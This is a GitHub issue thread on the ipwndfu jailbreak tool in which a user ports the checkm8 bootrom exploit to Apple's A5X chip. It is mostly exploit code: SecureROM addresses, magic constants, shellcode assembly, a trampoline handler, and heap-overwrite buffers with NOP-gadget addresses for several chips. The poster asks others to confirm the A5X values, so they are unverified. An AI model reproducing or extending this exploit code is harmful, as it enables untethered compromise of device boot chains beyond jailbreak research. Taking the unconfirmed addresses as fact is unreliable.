axi0mX / ipwndfu

open-source jailbreaking tool for many iOS devices
GNU General Public License v3.0

Question about address #283

Closed soulilya closed 1 year ago

soulilya commented 2 years ago

Hello. I am trying to develop checkm8 for A5X. I have already found all the addresses for the necessary constants and functions (USB and magic addresses). I tried to work out the leak, request quantity and padding, but I can't sniff USB. How can I do that through the SecureROM source code? And please tell me if there is something else... Thanks

soulilya commented 2 years ago

Where i can get this values: https://github.com/axi0mX/ipwndfu/blob/0e28932ec6a2a570b10fd77e50bda4216418cd98/checkm8.py#L441

ghost commented 2 years ago

Hi how are you does this have to do will all the malware in my calendar. I had to change all my passwords. I'm so sorry if I messed up some how

soulilya commented 2 years ago

OK, I think I have now found all the values. Since the tool is unstable, how can I test that it works properly? Right now I only have Windows 10 and WSL, sadly... These are my findings on A5X; could someone please confirm they are correct:

if cpid == 0x8945:
    constants_usb_s5l8945x = [
                0x34000000, # 1 - LOAD_ADDRESS
                0x65786563, # 2 - EXEC_MAGIC
                0x646F6E65, # 3 - DONE_MAGIC
                0x6D656D63, # 4 - MEMC_MAGIC
                0x6D656D73, # 5 - MEMS_MAGIC
                  0x72F4+1, # 6 - USB_CORE_DO_IO      
    ]
    constants_checkm8_s5l8945x = [
                0x3402D888, # 1 - gUSBDescriptors
                0x3402DDE0, # 2 - gUSBSerialNumber
                  0x7878+1, # 3 - usb_create_string_descriptor
                0x3402C1B4, # 4 - gUSBSRNMStringDescriptor
                0x34039800, # 5 - PAYLOAD_DEST
      PAYLOAD_OFFSET_ARMV7, # 6 - PAYLOAD_OFFSET
        PAYLOAD_SIZE_ARMV7, # 7 - PAYLOAD_SIZE
                0x3402D904, # 8 - PAYLOAD_PTR      
    ]
    s5l8945x_handler = asm_thumb_trampoline(0x34039800+1, 0x7D60+1) + prepare_shellcode('usb_0xA1_2_armv7', constants_usb_s5l8945x)[8:]
    s5l8945x_shellcode = prepare_shellcode('checkm8_armv7', constants_checkm8_s5l8945x)
    assert len(s5l8945x_shellcode) <= PAYLOAD_OFFSET_ARMV7
    assert len(s5l8945x_handler) <= PAYLOAD_SIZE_ARMV7
    return s5l8945x_shellcode + '\0' * (PAYLOAD_OFFSET_ARMV7 - len(s5l8945x_shellcode)) + s5l8945x_handler

def all_exploit_configs():
  """Return the list of DeviceConfig entries, one per supported chip id.

  Each entry pairs an iBoot version string and a chip id with the
  fixed-layout overwrite buffer assembled below. DeviceConfig is defined
  elsewhere in the project, so the meaning of its remaining positional
  arguments (the integer-or-None third value and the two trailing ones)
  is not visible here; check its definition before changing any entry.
  """
  # Per-chip addresses that are packed twice into the t80xx buffers below.
  # NOTE(review): their provenance is not shown in this file - confirm
  # against the source they were taken from before relying on them.
  t8010_nop_gadget = 0x10000CC6C
  t8011_nop_gadget = 0x10000CD0C
  t8015_nop_gadget = 0x10000A9C4

  # Each buffer is a run of NUL padding followed by a struct.pack() result.
  # In the format strings, 'x' is a single pad byte, 'I' a 32-bit and 'Q' a
  # 64-bit unsigned value, all little-endian ('<'), so the overall byte
  # layout is fixed by the format string and the padding length.
  # NOTE(review): this relies on Python 2 string semantics - '\0' * n is a
  # str and struct.pack() returns str. Under Python 3 struct.pack() returns
  # bytes and the concatenation would raise TypeError.
  s5l8945x_overwrite = '\0' * 0x6c0 + struct.pack('<20xI4x', 0x34000000)
  s5l8947x_overwrite = '\0' * 0x660 + struct.pack('<20xI4x', 0x34000000)
  s5l895xx_overwrite = '\0' * 0x640 + struct.pack('<20xI4x', 0x10000000)
  t800x_overwrite    = '\0' * 0x5C0 + struct.pack('<20xI4x', 0x48818000)
  s5l8960x_overwrite = '\0' * 0x580 + struct.pack('<32xQ8x', 0x180380000)
  t8010_overwrite    = '\0' * 0x580 + struct.pack('<32x2Q16x32x2QI',    t8010_nop_gadget, 0x1800B0800, t8010_nop_gadget, 0x1800B0800, 0xbeefbeef)
  t8011_overwrite    = '\0' * 0x500 + struct.pack('<32x2Q16x32x2QI',    t8011_nop_gadget, 0x1800B0800, t8011_nop_gadget, 0x1800B0800, 0xbeefbeef)
  t8015_overwrite    = '\0' * 0x500 + struct.pack('<32x2Q16x32x2Q12xI', t8015_nop_gadget, 0x18001C020, t8015_nop_gadget, 0x18001C020, 0xbeefbeef)

  # Positional DeviceConfig arguments: iBoot version, chip id, an integer or
  # None, the overwrite buffer, then two values that are None for the
  # S5L-series entries and small integers for the T80xx entries. The
  # trailing comments are the original author's notes and timings; the
  # first (0x8945) entry is the only one without such a note.
  return [
    DeviceConfig('iBoot-1062.2',          0x8945,  620, s5l8945x_overwrite, None, None),
    DeviceConfig('iBoot-1458.2',          0x8947,  626, s5l8947x_overwrite, None, None), # S5L8947 (DFU loop)     1.97 seconds
    DeviceConfig('iBoot-1145.3'  ,        0x8950,  659, s5l895xx_overwrite, None, None), # S5L8950 (buttons)      2.30 seconds
    DeviceConfig('iBoot-1145.3.3',        0x8955,  659, s5l895xx_overwrite, None, None), # S5L8955 (buttons)      2.30 seconds
    DeviceConfig('iBoot-1704.10',         0x8960, 7936, s5l8960x_overwrite, None, None), # S5L8960 (buttons)     13.97 seconds
    DeviceConfig('iBoot-2651.0.0.1.31',   0x8002, None,    t800x_overwrite,    5,    1), # T8002 (DFU loop)  NEW: 1.27 seconds
    DeviceConfig('iBoot-2651.0.0.3.3',    0x8004, None,    t800x_overwrite,    5,    1), # T8004 (buttons)   NEW: 1.06 seconds
    DeviceConfig('iBoot-2696.0.0.1.33',   0x8010, None,    t8010_overwrite,    5,    1), # T8010 (buttons)   NEW: 0.68 seconds
    DeviceConfig('iBoot-3135.0.0.2.3',    0x8011, None,    t8011_overwrite,    6,    1), # T8011 (buttons)   NEW: 0.87 seconds
    DeviceConfig('iBoot-3332.0.0.1.23',   0x8015, None,    t8015_overwrite,    6,    1), # T8015 (DFU loop)  NEW: 0.66 seconds
  ]